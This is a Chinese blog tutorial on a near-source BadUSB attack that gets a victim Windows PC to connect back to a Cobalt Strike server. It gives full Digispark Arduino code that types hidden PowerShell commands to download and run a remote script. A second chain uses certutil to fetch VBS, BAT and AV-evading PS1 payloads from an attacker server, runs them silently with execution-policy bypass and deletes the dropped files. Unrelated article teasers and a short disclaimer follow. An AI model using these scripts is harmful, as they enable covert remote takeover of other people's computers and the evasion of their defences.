【近源攻击】badusb上线cs

news2024/9/24 19:43:11

❤️博客主页 iknow181
🔥系列专栏 网络安全、 Python、JavaSE、JavaWeb、CCNP
🎉欢迎大家点赞👍收藏⭐评论✍


在这里插入图片描述

0x01 实验前提

攻击设备:badusb
cs服务器:公网部署了 cs 服务端

0x02 实验步骤

1.CS 设置

添加一个 监听器

生成powershell一句话上线的命令

复制生成的 powershell 命令

2.上传 badusb

打开Arduino IDE

复制如下代码进行验证(Verify),ino内写入以下代码

ps:我使用的是 Digispark,而不是标准的 Arduino 板。

#include "DigiKeyboard.h"

// 定义常量
#define KEY_ENTER    0x28
#define KEY_SHIFT     0xE1
#define KEY_CTRL      0x1D
#define KEY_CAPS_LOCK 0x39

void setup() {
    DigiKeyboard.delay(3000);  // 延时3秒



    // 按下Win + R 打开运行框
    DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
    DigiKeyboard.delay(1000);  // 增加等待时间,确保运行框弹出

    // 输入命令 cmd 并回车
    DigiKeyboard.print(F("cmd"));
    DigiKeyboard.delay(500);  // 延时以确保输入完整
    DigiKeyboard.sendKeyStroke(KEY_ENTER);
    DigiKeyboard.sendKeyStroke(KEY_ENTER);
    DigiKeyboard.delay(1000);  // 延时确保命令行窗口打开

    // 输入法修正:按下Ctrl + Space切换到英文输入法
    DigiKeyboard.sendKeyStroke(KEY_SPACE, MOD_CONTROL_LEFT);
    DigiKeyboard.delay(500);  // 等待输入法切换

    // 输入PowerShell命令,下载并执行远程脚本
    DigiKeyboard.print(F("powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.1.135:80/b'))\""));
    DigiKeyboard.delay(500);  // 延时以确保输入完整
    DigiKeyboard.sendKeyStroke(KEY_ENTER);
    DigiKeyboard.delay(2000);  // 增加延时以确保命令执行时间充足
}

void loop() {
  // 空函数,留空即可
}

然后会运行一次作为示例,再次返回CS,发现已成功上线

0x03 Badusb实现后台静默执行上线免杀CS 马

0.原因

免杀木马的意义就是绕过对方主机的一些策略。

比如如果对方的的权限过低,直接执行 ps1 的命令会显示拒绝访问。

又或者如果是让对方直接下载没有免杀的木马会被电脑发现可能是病毒文件拒绝执行。

1.制作免杀 cs 马

具体看我的免杀文章

【免杀】CS免杀——ps1免杀-CSDN博客

2.实现

a.开启 http

在你的 vps 上开一个 http 服务,把要利用的文件全放在该目录下,好让目标主机下载运行

可以使用apache 开一个网站,将文件放在网站根目录下。

apt-get install apache2

/var/www/html

service apache2 start

也可以创建一个专门放 shell 的文件夹,然后开一个 python 的 http 服务。

python3 -m http.server 8888

b.badusb 的代码

WIN+R打开运行窗口,通过打开CMD下载RUN.VBS,落地到D盘根目录后CMD关闭,并静默执行RUN.VBS

#include "DigiKeyboard.h"

// 定义常量
#define KEY_ENTER    0x28
#define KEY_SHIFT    0xE1

void setup() {
    DigiKeyboard.delay(3000);  // 延时3秒,等待目标系统准备

    // 打开运行框:按下 Win + R
    DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
    DigiKeyboard.delay(1000);  // 增加等待时间,确保运行框弹出

    // 输入 cmd 并回车
    DigiKeyboard.print(F("cmd"));
    DigiKeyboard.delay(500);  // 延时以确保输入完整
    DigiKeyboard.sendKeyStroke(KEY_ENTER);
    DigiKeyboard.sendKeyStroke(KEY_ENTER);
    DigiKeyboard.delay(1000);  // 延时确保命令行窗口打开


    //利用开大写输小写绕过输入法
    DigiKeyboard.sendKeyStroke(KEY_CAPS_LOCK);
    DigiKeyboard.delay(200);

    // 输入 PowerShell 命令,下载并执行远程脚本
    DigiKeyboard.print("cmd /q /c mode con:COLS=15 LINES=1 && certutil -urlcache -split -f http://192.168.1.1:8888/RUN.VBS d:\\RUN.VBS && timeout /t 1 && start /B d:\\RUN.VBS" ); //无回显

    //DigiKeyboard.print("cmd /T:01 /K \"@echo off && mode con:COLS=15 LINES=1\""); //有回显



    DigiKeyboard.delay(500);  // 延时确保输入完整
    DigiKeyboard.sendKeyStroke(KEY_ENTER);
    DigiKeyboard.delay(2000);  // 确保命令有足够的时间执行

    DigiKeyboard.end();//结束键盘通讯
}

void loop() {
  // 空函数,留空即可
}

c.落地文件

RUN.VBS

通过certutil命令远程下载POWERSHELL.BAT,落地到D盘根目录

静默执行POWERSHELL.BAT

set ws=WScript.CreateObject("WScript.Shell")
ws.Run "cmd /c certutil -urlcache -split -f http://192.168.1.1:8888/POWERSHELL.BAT d:\\POWERSHELL.BAT && start /B d:\\POWERSHELL.BAT",0
POWERSHELL.BAT

通过certutil命令下载POWERSHELL.PS1,落地到D盘根目录

考虑网络问题,下载POWERSHELL.PS1需要时间(测试的时候出现了执行速度太快,导致没下载完就直接执行了下一步),所以延时一秒

通过powershell后台静默执行POWERSHELL.PS1,至此CS上线

上线后立即删除R开头VBS文件

延时一秒(测试出现powershell执行速度太慢,没上线)

依次删除落地的恶意文件

@echo off

certutil -urlcache -split -f http://192.168.1.1:8888/POWERSHELL.PS1 d:\\POWERSHELL.PS1

TIMEOUT /T 1

start /B powershell.exe -executionpolicy bypass -file d:\\POWERSHELL.PS1

del "D:\RUN.VBS" /f /s /q
del "D:\POWERSHELL.PS1" /f /s /q
del "D:\POWERSHELL.BAT" /f /s /q

exit
POWERSHELL.PS1

使用之前写的免杀 cs 马

把这三个文件上传到网站,badusb一插入机器就上线了。

0x03 免责说明

本文章仅用于学习、工作与兴趣爱好,并立志为网络安全奉献一份力量,凡是利用本博客相关内容的无良hackers造成的安全事故均与本人无关!

在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2161246.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

入耳式耳机戴久不舒服?真心劝你试试这五款骨传导耳机~

基于对运动耳机长时间的使用体验和细致研究,我有以下几点务实的建议想与大家交流:在做出购买决定之前,请多加思考,避免盲目追逐市场热点。有时候,那些突然风靡的网红耳机可能只是短暂的流行;同样&#xff0…

新学期月考成绩发布工具-易查分

老师们,新学期的第一次月考即将到来,是不是在想如何高效又安全地发布成绩呢?别担心,我来给你们介绍一个超实用的小工具——易查分小程序! 新学期,新挑战,但发布成绩这件事,可以变得…

# Windows环境下VSCode + Jupyter + Conda的AI学习环境配置指南

Windows环境下VSCode Jupyter Conda的AI学习环境配置指南 目录 Windows环境下VSCode Jupyter Conda的AI学习环境配置指南 优点 1. 安装Anaconda 2. 安装Visual Studio Code 3. 在VSCode中配置Python环境 4. 安装和配置Jupyter 5. 创建和管理虚拟环境 6. 安装常用的…

通信工程学习:什么是VNF虚拟网络功能

VNF:虚拟网络功能 VNF(Virtual Network Function)即虚拟网络功能,是网络功能虚拟化(NFV)架构中的一个核心概念。VNF允许通过软件化和虚拟化的方式,将传统的网络设备功能(如路由器、交…

CREO教程——2 绘制标准图纸

CREO教程——2 绘制标准图纸 说明:继承第一章设置好的配置文件,这一章进行学习分享如何定制自己的图纸图框,参考国家标准距,定制属于设计师或单位的通用图框。 1.设置工作目录 1.1设置工作目录 1.打开软件设置工作目录&#x…

MySQL按照经纬度排序 查询出商家信息

首先自己写公式算法,这个我们懒 就不写了,pass~ ST_Distance_Sphere用法和示例: 我们懒人使用MySQL自带的函数先看查询出的结果示例:示例代码(看代码直接跳这):注意事项 我们懒人使用MySQL自带的函数 ST_Distance_Sphe…

scrapy spider框架download下来就可以用

一.通过命令行创建scrapy项目 1.scrapy startproject project_Spider 二.通过命令行创建spider 1.scrapy genspider firstspider 2.定义需要抓取的字段,在items.py文件中对目标字段进行定义 # Define here the models for your scraped items # # See documentation in: # …

Java面试篇基础部分-Semaphore及其用法详解

Semaphore 是一种基于计数的信号量,在定义信号量对象的时候可以设置一个阈值,然后基于这个阈值,多线程可以竞争访问信号量,线程竞争到许可的信号之后,开始执行具体的业务逻辑,业务逻辑在执行完成之后释放这…

程序员修炼之道 13:务实的项目

不记录,等于没读。 这里是我阅读《程序员修炼之道》这本书的记录和思考。 务实的团队 一个项目不只你一个人,就需要建立一些基本规则,并依次将项目的各部分分配出去。 程序员有点像猫:聪明、意志坚强、固执己见、独立、并且经常…

3. 函数

函数是 JavaScript 编程中最重要的工具之一。用一个值封装一段程序的概念有很多用途。它为我们提供了一种结构化大型程序的方法,可以减少重复,将名称与子程序关联起来,并将这些子程序相互隔离。 函数最明显的应用是定义新的词汇。在散文中创造…

一款前后端分离CRM客户关系管理系统,支持客户,商机,线索,合同,发票,审核,商品等功能(附源码)

前言 在当今竞争激烈的商业环境中,企业面临着各种挑战,其中包括如何更有效地管理和跟进潜在客户以提高销售业绩。传统的客户管理方式往往效率低下,无法实时更新客户-信息,导致销售机会流失。因此,市场上急需一款能够简…

计算机毕设选题推荐-基于python的电子健康信息分析系统【源码+文档+调试】

精彩专栏推荐订阅:在下方主页👇🏻👇🏻👇🏻👇🏻 💖🔥作者主页:计算机毕设木哥🔥 💖 文章目录 一、电子健康信息…

【解决虚拟机NAT联网】收藏这份教程就不用再辛苦找了

网上的教程一大堆,看的云里雾里,对于一个小白来说这里看懂了,下一步又看不懂了,一模一样的去设置也不一定成功。 解决办法01 恢复默认设置: 首先公布一个最基础的最直接最有效的恢复网络的办法: 关闭虚拟…

Python字典进阶:setdefault技巧让你的代码更优雅,用setdefault优化你的Python数据处理流程

推荐阅读: 数据科学的秘密武器:defaultdict——Python字典的自动化填充神器,让数据结构更灵活 一、什么是setdefault Python中的setdefault方法是字典(dict)类型的一个非常实用的方法,它允许开发者在尝试…

Invalid Executable The executable contains bitcode

Invalid Executable The executable contains bitcode xcode世界xcode16后,打包上传testflight时三方库报错:Invalid Executable - The executable ***.app/Frameworks/xxx.framework/xxx contains bitcode. 解决方案: 执行一下指令删除该f…

创建单链表

一、完成单链表操作,要求节点构造类型。 1、建立学生结构体(学号,姓名,成绩) 2、循环调用头插法创建整表 3、遍历单链表 4、任意位置插入一个完整的学生信息 5、任意位置删除一个学生。 6、单链表逆置 7、单链表按照学…

Vulnhub:Fowsniff 1

靶机下载地址 信息收集 主机发现 nmap 192.168.31.0/24 -Pn -T4 靶机ip:192.168.31.134 端口扫描 nmap 192.168.31.134 -A -p- -T4 开放端口22(ssh)、80(http),和两个明文传输的邮件端口110(pop3)、143(imap)。 HTTP 访问http://192.168.31.134。…

云栖实录 | 阿里云 OpenLake 解决方案重磅发布:多模态数据统一纳管、引擎平权联合计算、数据共享统一读写

新一轮人工智能浪潮正在重塑世界,以生成式 AI 为代表的技术快速应用,推动了数据与智能的深化融合,同时也给数据基础设施带来了全新的变革与挑战。面向 AI 时代的数据基础设施如何构建?底层数据平台架构在 AI 时代如何演进&#xf…

word怎么加密?掌握这4种加密技巧,保护你的文件安全!

数字化办公社会,文档安全显得尤为重要。 无论是商业机密、个人隐私还是学术成果,我们都希望它们能在传递过程中得到妥善保护。 Word文档作为最常用的文档处理工具,用户有效保障文档的安全性是维护企业信息安全的重要渠道。 Word文档的加密是…

纯血鸿蒙APP开发启动页面无法全屏解决办法

先来看问题: 本身APP并不需要全屏,但是启动页这种特殊页面确实需要忽略页面上下的安全边界区域,解决办法也很简单,直接上代码: Image($r(app.media.launch_icon)) .width(100%) .height(100%) .expandSafeArea([SafeA…